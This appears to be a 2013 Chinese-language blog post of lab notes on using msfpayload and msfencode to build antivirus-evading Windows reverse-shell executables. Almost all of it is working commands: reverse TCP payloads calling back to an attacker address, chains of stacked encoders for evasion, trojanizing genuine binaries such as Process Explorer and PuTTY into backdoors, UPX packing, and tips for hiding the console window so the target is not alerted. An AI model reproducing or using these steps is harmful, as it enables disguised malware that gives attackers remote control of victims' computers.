2013年6月6日 星期四

msfpayload生成2进制文件并免杀

使用编码器

msfencode -l  查看编码
不知道是不是书上那个有错 输出 exe那里 反正改成 -exe 它就能生成
msfpayload windows/shell_reverse_tcp LHOST=192.168.159.128 LPORT=31337 R msfencode -e x86/shikata_ga_nai -t -exe > /root/Desktop/payload3.exe


4 多种编码 注意-exe -o 那里 没有> 直接 /var/www/payload3.exe 数字均代表使用对应编码几次
msfpayload windows/shell_reverse_tcp LHOST=192.168.159.128 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 8 -t exe -o /root/Desktop/payload4.exe

下面这个编码自己配的 上不了线 晕
msfpayload windows/shell_reverse_tcp LHOST=192.168.159.128 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/fnstenv_mov -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 8 -t exe -o /root/Desktop/payload4.exe

[*] x86/countdown succeeded with size 1625 (iteration=1)

[*] x86/countdown succeeded with size 1643 (iteration=2)

[*] x86/countdown succeeded with size 1661 (iteration=3)

[*] x86/countdown succeeded with size 1679 (iteration=4)

[*] x86/countdown succeeded with size 1697 (iteration=5)

5 自定义Payload模板(捆绑+签名+编码)

wget http://download.sysinternals.com/files/ProcessExplorer.zip 下载微软的processExplorer

root@K8team:~/Desktop# unzip ProcessExplorer.zip
Archive:  ProcessExplorer.zip
  inflating: Eula.txt              
  inflating: procexp.chm           
  inflating: procexp.exe

root@K8team:~/Desktop# msfpayload windows/shell_reverse_tcp LHOST=192.168.159.128 LPORT=31337 R | msfencode -t exe -x /root/Desktop/procexp.exe -o /root/Desktop/payload5.exe -e x86/shikata_ga_nai -c 5

实测 在WIN2003下 第一次运行时 提示 什么签名有误(好像是微软的自校验 换另一个模板应该没问题) 再次运行 NC上线

使用UPX压缩 BT5-R3里自带 3.04
upx -5 /root/Desktop/payload5.exe

6 隐秘启动 一个攻击载荷 payload
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

msfpayload windows/shell_reverse_tcp LHOST=192.168.21.129 LPORT=31337 R | msfencode -t exe -x ./putty.exe -o /root/Desktop/putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5

-K选项 设置payload在一个独立线程中启动 这样被宿主程序不会受到影响
-k选项不一定能用在所有程序上 所以攻击前 你必须经过设置
如果想把payload捆到可执行文件 最好使用图形界面 就算没启用-k参数 攻击时也不会启动任何窗口
因为命令行窗口 运行后 在显示黑框  而且要等到payload使用完毕 它才消失

请一定要注意这个小细节 要不然攻击时 很容易惊动目标

沒有留言:

張貼留言